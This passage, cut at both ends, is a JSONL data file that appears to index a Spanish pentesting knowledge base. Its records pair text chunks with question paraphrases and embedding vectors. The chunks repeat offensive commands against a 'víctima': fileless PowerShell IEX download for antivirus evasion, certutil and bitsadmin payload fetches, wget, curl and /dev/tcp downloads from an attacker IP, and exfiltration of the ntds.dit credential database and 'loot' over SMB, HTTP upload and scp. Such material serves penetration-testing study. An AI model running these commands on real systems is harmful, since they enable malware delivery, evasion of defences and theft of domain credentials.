clΓ‘sico\ntftp -i TU_IP get f.exe # (DISM /online /Enable-Feature /FeatureName:TFTP)\n```\n```cmd\nnet use x: \\\\TU_IP\\SERVER /user:u p & copy x:\\f.exe . # vΓ­a SMB\n```", "indexar": "cual programa puedo usar para obtener un ejecutable de manera fileless y evadir antivirus?", "v": [-0.08569, 0.02192, -0.19059, -0.03593, 0.05501, 0.03143, 0.03792, -0.07503, -0.1748, -0.10753, -0.14058, -0.1789, -0.04251, 0.01611, 0.01959, 0.00855, 0.12743, -0.10111, 0.04388, 0.03427, 0.02725, -0.0356, -0.08659, -0.05148, -0.07093, 0.1948, -0.08312, 0.12721, -0.05505, -0.05595, 0.00369, 0.07777, 0.07697, -0.12249, -0.00817, 0.08905, -0.03959, 0.00447, -0.00696, 0.07504, 0.09962, 0.03105, -0.12377, 0.00442, 0.01432, -0.04308, 0.03541, 0.00659, 0.01774, -0.00979, -0.04189, 0.0528, -0.12884, -0.05887, 0.03668, -0.15368, -0.01855, -0.20008, 0.00504, 0.0215, -0.09548, 0.04213, -0.00405, -0.00158, 0.02852, -0.03272, 0.07356, -0.05665, -0.10276, 0.03076, -0.05268, 0.1476, 0.03322, -0.00371, -0.02326, -0.05979, -0.11769, -0.05857, 0.05001, 0.01831, -0.00871, -0.05129, 0.00265, -0.0073, -0.15347, -0.10109, -0.00382, -0.06272, -0.01531, -0.03645, 0.00756, 0.03244, -0.04195, 0.09172, 0.0775, -0.09266, 0.10964, 0.06756, 0.01678, 0.02552, 0.09796, -0.06385, -0.08898, 0.15146, -0.03978, -0.04025, 0.00165, 0.00876, -0.05893, -0.02775, -0.00785, -0.02231, -0.06618, -0.02741, -0.06455, -0.09387, -0.02321, -0.07344, 0.03572, -0.06837, -0.10215, 0.03186, -0.11169, 0.04105, 0.117, -0.06074, 0.00787, 0.09457, -0.09387, 0.02144, 0.03452, -0.05787, -0.02018, -0.10055, -0.08663, -0.02201, 0.05078, -0.04826, -0.03754, -0.05071, 0.09688, 0.02895, 0.00838, 0.06554, 0.037, -0.00945, -0.01384, -0.11447, -0.03989, 0.02934, 0.09465, 0.03036, -0.06081, 0.04634, -0.06133, -0.0178, -0.01504, -0.04272, 0.00323, 0.00223, -0.02576, 0.05844, 0.02358, -0.02585, 0.03045, -0.05903, -0.02106, 0.00183, 0.05881, 0.08617, 0.01355, 0.07096, 0.01677, -0.07981, -0.0049, -0.07182, -0.02883, -0.09438, 0.03731, -0.01367, -0.01332, 0.04029, 0.02282, -0.01234, 0.00393, -0.02171, 0.04343, 0.00561, -0.01967, 0.04045, -0.00715, 0.03525, -0.05796, -0.00711, -0.00573, -0.05814, -0.00894, -0.03386, 0.05022, -0.00879, -0.09534, -0.01657, -0.01934, -0.05894, 0.10279, 0.08772, -0.04699, 0.00823, -0.00211, 0.07854, 0.03115, -0.01622, 0.03047, 0.01217, -0.05046, -0.04814, -0.00387, 0.00532, 0.06177, 0.0145, -0.00468, 0.00075, 0.08137, -0.01673, 0.01117, -0.0334, 0.01606, 0.02047, -0.00398, -0.01591, -0.05605, 0.00691, 0.01398, -0.06693, 0.02608, 0.02172, 0.00622, -0.03849, -0.01174, -0.0518, -0.02061, 0.10322, -0.00079, -0.08086, -0.03668, -0.00337, -0.07652, 0.03831, 0.01312, -0.01719, -0.04325, 0.03477, 0.01038, -0.00548, 0.02855, -0.0007]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Windows\n```powershell\n(New-Object Net.WebClient).DownloadFile('http://TU_IP/f.exe','C:\\Windows\\Temp\\f.exe')\nInvoke-WebRequest http://TU_IP/f.exe -OutFile f.exe # iwr\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/x.ps1') # fileless β†’ AV evasion\nbitsadmin /transfer job http://TU_IP/f.exe C:\\Temp\\f.exe\ncertutil.exe -urlcache -split -f \"http://TU_IP/f.exe\" f.exe # LOLBin clΓ‘sico\ntftp -i TU_IP get f.exe # (DISM /online /Enable-Feature /FeatureName:TFTP)\n```\n```cmd\nnet use x: \\\\TU_IP\\SERVER /user:u p & copy x:\\f.exe . # vΓ­a SMB\n```", "indexar": "con que metodo puedo transferir archivos desde una direcciΓ³n IP local en modo de vΓ­ctima?", "v": [0.03181, 0.06781, -0.17928, -0.14296, -0.05456, -0.13245, -0.0028, 0.00798, -0.14109, -0.00787, 0.10181, -0.07953, 0.12188, -0.0494, -0.00251, -0.01808, 0.20052, -0.00861, 0.13096, -0.20497, -0.04457, 0.05015, -0.02513, -0.0442, -0.06345, 0.0826, -0.0521, 0.06392, -0.11082, -0.05206, -0.11288, -0.11536, -0.00037, 0.03677, -0.01314, -0.06882, 0.02449, 0.12345, -0.0447, 0.06093, 0.03904, -0.01301, -0.0751, 0.03323, 0.03338, -0.0696, 0.00225, -0.11044, 0.02279, -0.00143, -0.03117, -0.14226, -0.10063, -0.11036, -0.11917, 0.02816, 0.00972, -0.07379, 0.02827, 0.02428, 0.01913, 0.04544, -0.06243, 0.09712, 0.05251, -0.09955, -0.00379, 0.0806, -0.17355, -0.00037, 0.08649, -0.0129, -0.04478, 0.08861, -0.04999, -0.04261, 0.00877, -0.01413, 0.03552, -0.06829, 0.02034, 0.03383, -0.11179, -0.0291, -0.08805, 0.01438, 0.10526, -0.16066, 0.07603, -0.11521, 0.01012, -0.11854, 0.07947, -0.01534, 0.00881, -0.05502, 0.00358, 0.01566, -0.02357, -0.07373, 0.05344, 0.02472, -0.03111, 0.14428, 0.18485, 0.05212, 0.03156, 0.06402, 0.04847, -0.0639, -0.00076, 0.09892, 0.05697, 0.03573, -0.06041, -0.02732, 0.0066, 0.01372, 0.00273, 0.04273, -0.0332, 0.02217, 0.02335, 0.0099, -0.03162, -0.02371, -0.02973, 0.05569, -0.03416, 0.03209, 0.02971, 0.0437, -0.00751, -0.01732, 0.07557, 0.00803, 0.06965, 0.04196, 0.00896, -0.00372, 0.05017, -0.04127, -0.00435, -0.04211, 0.02596, -0.07145, -0.00041, -0.1057, -0.08339, -0.08311, 0.04855, 0.01983, 0.00256, -0.00815, -0.12197, 0.04791, 0.0201, -0.09712, -0.02529, 0.0766, -0.0467, 0.0927, -0.00224, 0.01227, -0.02417, -0.10507, 0.00046, 0.0167, 0.06882, -0.06278, -0.00517, 0.03556, -0.0443, 0.01382, -0.02749, -0.06331, 0.01248, -0.07358, 0.01877, 0.01374, 0.04573, 0.04857, -0.03767, 0.03546, 0.07083, 0.0106, 0.02638, 0.05223, -0.02736, 0.07713, 0.00804, 0.01057, -0.01094, 0.04426, -0.04839, -0.03962, -0.04744, 0.05333, -0.053, -0.0074, -0.08068, 0.02026, 0.03308, -0.02565, 0.00768, 0.04657, -0.05585, -0.03949, -0.05638, 0.0122, -0.01523, -0.03233, 0.09645, -0.08563, -0.02846, -0.00157, -0.03477, -0.08726, -0.01365, 0.07152, 0.02359, -0.02376, -0.00113, -0.0152, -0.0253, 0.02507, -0.02134, 0.00926, -0.03404, 0.01453, -0.0425, 0.06412, 0.01357, -0.04155, 0.06663, -0.00672, -0.01473, -0.03961, -0.06766, -0.00667, -0.01765, 0.01787, -0.00624, 0.00513, -0.03945, -0.0065, -0.11937, 0.01528, 0.02797, -0.09024, 0.01786, 0.00811, 0.027, 0.00788, -0.02754, -0.03476]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Linux\n```bash\nwget http://TU_IP/f -O f ; curl -o f http://TU_IP/f\nphp -r '$f=file_get_contents(\"http://TU_IP/f\");file_put_contents(\"f\",$f);'\npython3 -c \"import urllib.request;urllib.request.urlretrieve('http://TU_IP/f','f')\"\ncat < /dev/tcp/TU_IP/7788 > f # con nc -lvnp 7788 < f en Kali\n```", "indexar": "que programa hay para descargar archivos desde un servidor web en Linux?", "v": [-0.05225, -0.00531, -0.04629, -0.24821, -0.06573, -0.1563, -0.08288, -0.01147, -0.0139, 0.01791, -0.04045, -0.11048, 0.02353, -0.09386, 0.02125, -0.01449, 0.09251, -0.13487, 0.08664, -0.02483, -0.04254, 0.16094, -0.05804, -0.0461, 0.00125, -0.0044, 0.03515, -0.05986, 0.0027, 0.00458, -0.0695, -0.02421, 0.043, 0.0593, -0.0126, 0.07806, 0.07493, 0.07819, 0.03062, 0.06479, 0.11144, -0.01984, -0.03044, 0.08189, -0.07698, -0.15311, 0.13997, -0.10734, 0.11195, -0.15232, 0.02046, -0.03382, -0.03115, 0.00066, 0.02412, -0.0261, 0.04226, -0.22624, 0.05046, -0.00432, -0.15431, 0.0934, -0.0305, -0.07129, 0.03394, 0.04356, -0.0238, 0.01043, -0.15377, -0.00017, 0.01591, 0.10961, 0.02013, -0.03818, 0.01298, 0.0422, -0.07232, -0.0253, 0.00679, -0.00775, 0.08177, -0.00781, 0.05479, 0.13122, -0.13148, -0.14274, 0.01825, 0.03347, 0.01795, 0.06, 0.09554, 0.08009, -0.04406, 0.10953, 0.05838, -0.07537, 0.17546, 0.0314, 0.04366, -0.01705, -0.05675, 0.03898, -0.03132, 0.09278, 0.0301, 0.11961, 0.08756, -0.00506, -0.00851, -0.00831, 0.05849, -0.0352, 0.047, 0.03569, -0.10843, -0.02592, 0.03303, 0.00899, 0.01254, -0.02098, -0.09135, 0.04414, -0.04986, 0.03984, 0.01814, -0.03568, 0.01136, 0.10301, -0.09858, -0.04319, 0.05377, -0.0972, -0.05605, 0.0553, -0.07739, 0.0019, 0.07677, -0.06687, -0.05703, -0.04506, 0.03572, 0.02146, -0.02254, 0.07961, 0.14267, -0.0142, 0.03439, -0.07858, -0.0382, -0.06638, -0.00629, -0.0147, -0.0257, -0.05133, -0.11739, -0.02113, 0.01303, -0.06754, -0.0791, -0.01852, -0.02144, 0.01341, 0.02104, 0.01948, -0.02876, -0.01242, -0.00985, 0.11371, 0.04445, 0.06152, 0.007, 0.0792, -0.00831, -0.09865, 0.00682, -0.02412, -0.00202, -0.09354, 0.02355, 0.01613, -0.05484, 0.02084, 0.0511, 0.02379, -0.03892, -0.00548, -0.01854, 0.06553, -0.03134, 0.01512, 0.01856, 0.01921, -0.07402, 0.02818, 0.01583, 0.01441, -0.06699, 0.00649, -0.00465, -0.02519, -0.0972, -0.04458, -0.03553, 0.00164, 0.00977, 0.0065, -0.01187, -0.02182, 0.01929, 0.02681, -0.03465, 0.00876, 0.07013, -0.03843, 0.02744, -0.02348, 0.06372, 0.04127, 0.05962, -0.00853, -0.03475, -0.00896, 0.05308, 0.02352, -0.00857, -0.05667, 0.00293, 0.01223, 0.03515, -0.01415, -0.00126, -0.01665, 0.00564, -0.01358, -0.0002, -0.01191, -0.00345, -0.00125, -0.02362, -0.06393, -0.05749, 0.08932, 0.01612, -0.0722, -0.04615, -0.06212, -0.01005, -0.03472, 0.00068, -0.00397, -0.02899, 0.00248, -0.00525, -0.00378, -0.02921, 0.05108]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Linux\n```bash\nwget http://TU_IP/f -O f ; curl -o f http://TU_IP/f\nphp -r '$f=file_get_contents(\"http://TU_IP/f\");file_put_contents(\"f\",$f);'\npython3 -c \"import urllib.request;urllib.request.urlretrieve('http://TU_IP/f','f')\"\ncat < /dev/tcp/TU_IP/7788 > f # con nc -lvnp 7788 < f en Kali\n```", "indexar": "con que puedo ejecutar una secuencia de comandos para obtener el contenido de una URL y guardarlo como archivo en la vΓ­ctima?", "v": [0.03535, 0.04403, -0.09207, -0.17338, -0.06879, -0.11261, -0.00708, 0.01117, 0.03187, -0.06176, -0.08425, -0.08153, 0.03675, 0.01415, -0.01162, 0.02113, 0.19264, 0.00785, -0.00724, 0.00473, 0.07894, 0.01262, 0.07717, 0.01048, -0.06995, 0.03728, 0.08491, 0.09465, -0.1068, -0.07085, -0.05596, 0.03929, 0.03683, -0.01563, -0.0329, 0.06364, -0.03948, 0.05756, -0.1307, 0.14639, 0.03565, 0.06401, -0.23266, 0.03794, -0.09328, -0.05982, 0.04503, 0.06209, 0.08413, -0.06011, 0.1036, -0.01637, -0.14058, -0.07018, -0.11214, -0.06451, 0.11684, -0.12366, 0.11173, 0.04043, -0.02743, -0.04929, 0.04957, 0.12551, -0.04814, -0.0524, -0.01433, 0.01463, -0.13031, 0.04175, -0.12824, 0.06482, -0.00377, 0.06981, 0.0281, -0.08695, -0.05031, -0.07198, -0.04791, 0.09623, -0.08621, -0.02553, -0.04054, 0.07863, -0.05537, -0.02939, -0.03156, -0.04589, 0.05131, -0.11976, 0.0957, -0.01241, -0.00524, 0.03922, 0.02908, -0.04819, 0.01978, -0.03906, 0.02989, -0.04945, 0.01197, -0.0841, -0.05787, 0.14675, 0.15683, 0.05931, -0.04421, 0.05957, -0.02775, 0.00751, -0.0098, -0.01109, 0.0342, -0.02544, -0.13924, -0.04782, -0.03412, -0.06076, 0.05097, -0.05146, -0.0738, 0.04825, -0.0265, 0.05082, -0.01567, -0.01514, -0.05195, 0.04052, -0.03131, -0.02684, -0.04168, 0.02743, 0.02155, -0.07868, 0.03968, 0.05926, 0.10224, -0.03553, -0.05975, -0.09817, 0.07109, -0.01268, -0.06339, 0.06743, 0.07637, -0.07211, -0.01239, -0.03727, -0.10099, -0.02931, 0.06132, -0.00791, -0.02279, -0.10095, -0.09826, -0.00571, 0.00151, -0.1271, 0.02107, 0.01832, -0.01624, 0.02814, -0.06962, 0.01011, 0.02866, -0.08289, -0.03224, -0.01629, 0.00454, -0.02967, 0.03427, -0.00439, -0.05554, -0.07125, -0.00992, -0.13121, -0.07437, -0.04389, 0.00671, 0.02273, -0.01337, 0.00474, -0.02179, 0.05908, -0.00949, -0.11679, 0.01878, 0.01243, -0.06353, 0.06734, 0.01085, 0.06273, -0.01482, 0.01575, 0.01719, -0.03581, -0.04354, 0.07703, -0.08263, 0.02711, -0.07049, -0.01402, 0.03169, -0.01355, 0.03993, -0.01303, -0.07512, 0.01796, -0.07112, -0.00435, 0.06051, 0.03798, 0.07138, -0.04027, -0.04988, -0.03809, 0.02579, 0.04221, -0.01437, -0.01155, -0.03009, 0.01751, 0.07575, -0.05823, 0.02989, -0.02696, -0.01671, 0.03944, -0.02534, -0.0301, -0.02048, 0.04395, -0.04197, -0.00353, 0.08061, -0.00356, -0.03147, 0.00253, -0.01806, -0.02806, -0.00974, 0.0614, -0.02374, -0.0368, 0.0101, -0.00873, -0.08868, 0.04511, -0.03029, -0.07937, -0.0285, 0.00045, 0.02555, -0.05044, -0.02543, -0.07151]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Linux\n```bash\nwget http://TU_IP/f -O f ; curl -o f http://TU_IP/f\nphp -r '$f=file_get_contents(\"http://TU_IP/f\");file_put_contents(\"f\",$f);'\npython3 -c \"import urllib.request;urllib.request.urlretrieve('http://TU_IP/f','f')\"\ncat < /dev/tcp/TU_IP/7788 > f # con nc -lvnp 7788 < f en Kali\n```", "indexar": "cual es una herramienta para transferir datos desde una IP especΓ­fica usando wget, curl o Python en Linux?", "v": [-0.0693, 0.02267, -0.11815, -0.19263, 0.05986, -0.27884, -0.10027, -0.00259, -0.11645, 0.03552, 0.01509, -0.06329, -0.02057, -0.07199, -0.10322, -0.06785, -0.06198, -0.15043, 0.07465, -0.14593, -0.12992, 0.12723, -0.16956, -0.12638, -0.03977, 0.13383, 0.01959, -0.01558, -0.0915, 0.04897, -0.06047, 0.00153, 0.01856, 0.04039, -0.12812, -0.06754, 0.03813, 0.15118, 0.03475, 0.03126, 0.02154, -0.0328, -0.04591, 0.16391, -0.03941, -0.07586, 0.01624, -0.01545, 0.05094, -0.06935, 0.0029, -0.10201, -0.10935, -0.03685, 0.01205, -0.054, 0.13346, -0.11131, 0.08175, 0.03129, -0.1335, 0.00065, -0.05991, 0.01777, 0.02039, -0.04295, -0.07687, -0.05762, -0.16728, 0.06642, 0.04403, 0.12735, -0.03053, 0.05926, 0.07329, 0.00669, -0.05246, 0.02423, 0.02809, -0.00387, -0.05493, -0.03486, -0.01635, 0.0257, -0.05089, -0.12938, 0.08362, -0.07165, 0.04563, 0.02107, 0.05032, 0.12644, 0.01792, 0.02833, 0.07907, 0.07542, 0.05429, 0.01138, -0.01699, -0.08242, 0.02766, 0.08297, -0.10023, 0.14864, 0.01574, 0.0556, 0.03157, -0.0135, -0.02311, -0.04099, 0.05315, -0.00116, 0.02121, 0.01754, 0.01967, -0.06318, -0.01587, -0.02962, -0.02196, -0.0029, 0.00715, 0.00414, -0.00785, 0.00993, -0.05321, 0.00055, -0.05577, 0.14072, -0.04547, -0.03535, -0.00394, -0.06327, -0.07008, 0.02943, -0.02204, 0.07265, 0.05113, -0.11424, 0.02809, 0.00493, -0.02735, 0.01038, -0.02565, 0.01655, 0.08902, -0.0114, 0.02252, -0.02533, -0.05617, -0.02974, 0.05342, -0.00845, 0.03056, 0.0231, -0.153, -0.01931, -0.04668, -0.02911, -0.10022, -0.04949, -0.01174, -0.02004, 0.06398, -0.03141, 0.01548, -0.04904, 0.00872, 0.04234, 0.08712, 0.02914, 0.00571, 0.01874, 0.01486, -0.01488, 0.02981, -0.09159, -0.00558, -0.0504, -0.03909, -0.04363, -0.00743, -0.00873, 0.00034, -0.04055, 0.07789, -0.00392, 0.02203, 0.04668, -0.03152, 0.03919, -0.01848, 0.04996, 0.03743, -0.03208, 0.02138, 0.00177, -0.04762, -0.04069, 0.02218, -0.00796, -0.0501, 0.01683, -0.037, -0.03693, 0.01101, 0.0584, -0.06749, -0.05306, -0.01491, -0.03694, -0.00556, 0.01553, 0.05936, -0.01148, 0.01035, -0.00405, 0.00907, 0.04856, 0.03147, 0.00476, -0.03991, 0.00822, 0.03011, -0.01627, -0.03276, -0.01368, 0.02233, 0.00161, -0.0153, -0.00229, 0.00271, 0.02832, 0.02611, 0.00065, 0.02324, -0.03185, -0.00802, -0.01637, -0.03709, -0.0109, -0.04297, 0.06011, -0.01765, -0.06843, -0.03463, -0.0152, -0.10253, 0.01405, -0.06447, -0.08366, -0.01966, -0.01414, 0.03627, -0.04489, -0.03144, 0.01271]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Exfiltrar de la vΓ­ctima β†’ Kali\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\SERVER\\ :: SMB (cifra, cruza firewalls) β†’ secretsdump\n(New-Object Net.WebClient).UploadFile('http://TU_IP/up.php','loot.zip')\n```\n```bash\nscp loot.tar user@TU_IP:/tmp/ # si hay SSH\n```", "indexar": "que programa sirve para extraer archivos del sistema de la vΓ­ctima y subirlos a un servidor remoto?", "v": [0.05917, -0.03947, -0.18922, -0.23014, -0.05319, -0.14106, -0.01519, -0.13908, 0.0369, -0.04674, -0.13201, -0.14886, 0.08662, -0.05526, 0.08339, -0.0551, 0.15409, -0.03271, 0.0852, 0.05667, 0.03169, 0.04096, 0.09408, -0.08299, -0.09955, 0.05418, 0.02927, 0.00959, -0.08337, -0.01443, -0.0045, -0.03549, 0.01724, -0.05054, 0.06827, -0.01821, 0.00428, 0.11077, -0.05476, 0.04336, 0.16107, -0.00699, -0.08816, -0.03894, -0.00674, -0.06019, 0.08561, -0.0393, 0.11384, -0.0231, -0.04241, -0.04215, -0.08864, -0.09492, -0.0383, -0.03398, 0.01037, -0.18081, 0.03664, -0.01763, -0.04252, 0.03793, 0.00809, -0.0813, 0.03702, -0.06825, -0.02294, 0.00566, -0.13933, 0.00653, -0.04859, -0.01618, 0.1179, -0.02449, -0.01779, -0.01155, -0.0183, -0.07372, 0.00528, -0.02587, -0.0392, 0.01831, -0.07623, 0.12651, -0.13931, -0.03999, 0.08196, 0.01189, 0.01672, -0.02556, 0.14776, -0.00727, 0.02536, 0.04703, 0.08694, -0.0903, 0.12486, -0.06941, -0.02238, -0.0436, 0.10009, -0.073, 0.02243, 0.14756, 0.03484, 0.08837, 0.09622, 0.01133, -0.03119, -0.03462, 0.05044, 0.03085, 0.0311, -0.02568, -0.15759, -0.07812, -0.02707, 0.00836, 0.02923, 0.0495, -0.01863, 0.05107, 0.07205, -0.0398, 0.0531, -0.04957, 0.01795, 0.06499, -0.00739, 0.01047, 0.05558, 0.05289, -0.02625, 0.00585, -0.01324, -0.07182, 0.09587, 0.01384, -0.05314, -0.07709, 0.05626, 0.05381, -0.0562, 0.01388, 0.07173, -0.03591, 0.07266, -0.05844, -0.02661, -0.0444, 0.04112, -0.01023, -0.02598, -0.0433, -0.13538, -0.06491, 0.00239, -0.13094, -0.08175, 0.05681, -0.02961, 0.00386, 0.03767, 0.0305, 0.01343, -0.0266, 0.02199, -0.03992, 0.13285, 0.06744, -0.01214, 0.04377, 0.02252, -0.05143, -0.01485, -0.02846, -0.01864, -0.11509, 0.01395, 0.02176, -0.08495, 0.03368, 0.01976, 0.01654, -0.04276, -0.02866, 0.00852, -0.00823, -0.0248, 0.03554, 0.00355, 0.00684, -0.07844, 0.056, -0.01167, -0.06167, -0.06024, 0.01545, 0.00155, 0.00435, -0.07929, 0.00726, 0.0415, -0.05483, 0.01274, 0.05064, 0.02163, -0.0109, 0.043, 0.09031, -0.00097, 0.01218, 0.09722, -0.0424, -0.01043, -0.02811, 0.02547, -0.01113, 0.04906, -0.01122, -0.02467, -0.02547, 0.02789, 0.04339, 0.0059, 0.01178, 0.00067, 0.05449, -0.00695, -0.07672, -0.04336, -0.0365, 0.02696, -0.00878, -0.00405, -0.06004, 0.0092, -0.02145, -0.0457, -0.09592, -0.01868, 0.09487, -0.00579, -0.06692, -0.04583, -0.02304, -0.03415, 0.00035, -0.00099, -0.04593, -0.02772, 0.00039, 0.02006, -0.0454, 0.00659, 0.00635]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Exfiltrar de la vΓ­ctima β†’ Kali\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\SERVER\\ :: SMB (cifra, cruza firewalls) β†’ secretsdump\n(New-Object Net.WebClient).UploadFile('http://TU_IP/up.php','loot.zip')\n```\n```bash\nscp loot.tar user@TU_IP:/tmp/ # si hay SSH\n```", "indexar": "con quΓ© herramienta puedo copiar datos desde Windows hacia mi propia IP usando SMB o SSH?", "v": [-0.04866, 0.01227, -0.1537, -0.0756, 0.03031, -0.28746, -0.12051, -0.20684, -0.11358, -0.00744, -0.01951, -0.02389, 0.05139, -0.1743, -0.08857, 0.0941, 0.06855, -0.13659, -0.0464, -0.01987, 0.03537, 0.028, -0.07341, -0.05003, -0.10427, 0.04278, 0.04062, 0.07808, -0.13731, -0.00813, -0.0778, 0.00949, 0.02127, -0.01591, -0.14041, -0.06852, -0.05666, 0.095, 0.04296, -0.02015, 0.10075, 0.06792, -0.0795, 0.04876, 0.08389, 0.02631, -0.01342, -0.04163, -0.04556, 0.02496, -0.11477, -0.10202, -0.1042, -0.03583, -0.08173, -0.07896, 0.22815, -0.12906, 0.03922, 0.01801, -0.11415, 0.13955, -0.0636, 0.05072, 0.05901, -0.13197, -0.0121, -0.03102, -0.07164, 0.08066, -0.03906, 0.08524, 0.00721, -0.00427, 0.06604, 0.03547, 0.00076, -0.00937, 0.08375, -0.02848, -0.03807, -0.03863, -0.0551, -0.01331, -0.02272, -0.10751, 0.04217, -0.07265, 0.02495, -0.10205, 0.01599, 0.05791, -0.03154, 0.05712, -0.01634, -0.03133, 0.02555, -0.03229, 0.02669, 0.0335, 0.04324, 0.00723, -0.11739, 0.11209, 0.05632, 0.06803, 0.05665, -0.06339, -0.04953, 0.00455, -0.00612, 0.04428, -0.02886, -0.03405, -0.03598, 0.00505, -0.02836, -0.10284, -0.02924, 0.03149, 0.02981, -0.02826, -0.05055, -0.05085, -0.0478, -0.03346, -0.02129, 0.13829, -0.08159, -0.05143, 0.02571, 0.01507, -0.034, -0.0162, 0.05087, 0.04777, -0.07745, -0.10908, 0.03871, -0.10433, 0.0286, 0.01944, -0.02649, -0.04117, 0.00611, -0.03764, 0.02833, -0.00639, -0.06877, -0.05721, 0.05473, -0.0236, -0.00207, 0.02928, -0.06366, 0.08689, 0.0018, -0.02821, -0.01897, 0.04119, -0.06499, -0.00856, 0.01423, 0.02534, 0.05333, -0.02103, 0.01342, 0.00299, 0.09127, 0.03493, -0.02656, 0.04654, 0.01467, -0.07692, 0.04241, -0.11232, -0.01377, 0.02191, -0.03844, -0.04781, -0.05085, 0.01614, -0.0088, -0.03352, 0.01137, -0.01104, 0.03421, 0.03467, 0.0015, -0.01233, -0.02676, 0.06526, 0.10004, -0.03924, 0.00403, -0.04582, -0.02893, -0.01843, 0.05008, 0.00831, -0.07796, 0.01286, -0.11713, -0.03803, 0.0906, 0.04273, -0.04513, 0.01002, 0.05582, -0.02545, -0.00077, -0.01735, 0.03908, -0.04213, -0.01592, -0.04579, 0.03679, 0.03382, 0.01562, -0.02526, 0.00857, 0.05453, 0.06708, -0.00235, -0.05312, -0.01093, -0.03034, 0.00265, 0.0014, -0.00387, 0.01477, 0.0574, 0.01907, -0.02514, 0.05483, -0.02863, -0.02439, -0.03851, -0.02685, -0.02426, -0.05533, 0.01811, -0.03912, -0.06479, -0.03558, -0.02684, -0.03705, 0.00597, -0.00252, -0.07755, 0.01812, -0.00961, 0.04857, -0.04372, -0.03168, 0.02494]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Exfiltrar de la vΓ­ctima β†’ Kali\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\SERVER\\ :: SMB (cifra, cruza firewalls) β†’ secretsdump\n(New-Object Net.WebClient).UploadFile('http://TU_IP/up.php','loot.zip')\n```\n```bash\nscp loot.tar user@TU_IP:/tmp/ # si hay SSH\n```", "indexar": "cual es una tecnica para descargar los secretos de la ntds.dit y enviarlo como archivo comprimido?", "v": [0.24837, -0.06713, 0.0069, -0.06727, 0.09263, -0.06118, -0.0549, 0.02387, -0.07067, 0.05837, -0.02845, -0.08504, 0.0024, -0.0627, -0.00457, -0.0503, 0.17746, -0.06475, 0.20189, 0.00629, 0.04242, -0.08426, -0.03305, -0.09757, -0.04357, -0.0738, 0.05359, 0.09504, -0.14884, -0.06154, -0.05185, -0.03942, 0.05312, 0.00564, -0.00887, 0.1683, 0.0835, 0.05254, -0.09814, 0.06488, 0.02724, 0.01851, -0.05522, 0.07198, -0.04758, -0.0855, 0.02562, 0.03456, 0.05291, -0.01805, 1e-05, 0.0082, -0.00648, -0.07197, -0.14545, -0.1587, 0.10521, -0.09002, 0.04719, 0.09295, 0.05943, 0.01867, 0.09412, 0.02231, -0.07303, -0.12783, -0.01188, 0.00379, -0.14652, -0.05361, -0.00473, 0.15545, 0.07782, 0.07067, -0.06451, 0.07953, -0.14177, -0.03628, -0.03241, 0.03674, 0.01554, -0.01849, -0.04934, -0.06466, -0.07016, -0.16572, 0.10897, -0.02154, -0.03085, -0.10583, 0.0467, -0.08344, -0.04337, 0.05671, 0.06288, -0.0817, -0.0227, 0.03749, 0.03034, 0.0175, 0.03279, 0.04023, -0.09353, 0.10096, 0.0366, 0.04181, -0.02904, -0.02546, 0.00786, 0.02451, -0.08177, 0.01954, 0.09462, 0.08583, 0.02224, -0.11503, 0.06875, -0.04172, -0.0381, -0.0853, -0.07464, 0.0672, -0.03324, 0.01307, -0.01032, -0.08454, -0.04491, 0.02768, -0.08255, 0.086, -0.08375, 0.0006, -0.08144, 0.02705, 0.03699, 0.0179, 0.063, 0.01066, -0.06616, -0.06993, 0.10443, -0.03004, -0.01403, 0.02119, 0.09292, 0.02459, 0.00739, -0.02335, -0.04249, -0.07066, 0.0411, -0.01413, 0.05777, -0.01449, 0.02389, 0.04059, 0.06933, -0.07997, -0.01798, 0.04824, -0.00917, 0.06975, 0.00976, -0.04007, -0.08746, -0.05948, -0.05952, 0.00468, -0.064, 0.03958, 0.00652, -0.06014, -0.01762, -0.06311, 0.0339, -0.0286, -0.04044, -0.02526, 0.06252, -0.03703, -0.04713, 0.05031, 0.0606, 0.05529, -0.01737, -0.0523, 0.01267, 0.00474, 0.03537, 0.0084, -0.00332, -0.00835, -0.03417, 0.0278, -0.01321, -0.02236, -0.06454, -0.00467, 0.04731, -0.04219, -0.03903, -0.03992, -0.05739, -0.03186, -0.01337, -0.05756, 0.0107, -0.02709, -0.06412, -0.00451, 0.0697, 0.03312, 0.00196, -0.04601, -0.01304, -0.03653, 0.02326, 0.02485, -0.01826, -0.01158, -0.03198, 0.03602, 0.11809, -0.04551, 0.01832, -0.00466, 0.03326, 0.02906, 0.0146, 0.03421, -0.02206, 0.09004, -0.00281, -0.00432, 0.09444, 0.05978, -0.01801, 0.04182, -0.02732, -0.06253, 0.01025, 0.06344, 0.01676, -0.02931, -0.04924, -0.01011, -0.05656, 0.03251, 0.04927, -0.04335, -0.00628, 0.01756, 0.035, 0.00172, 0.02512, 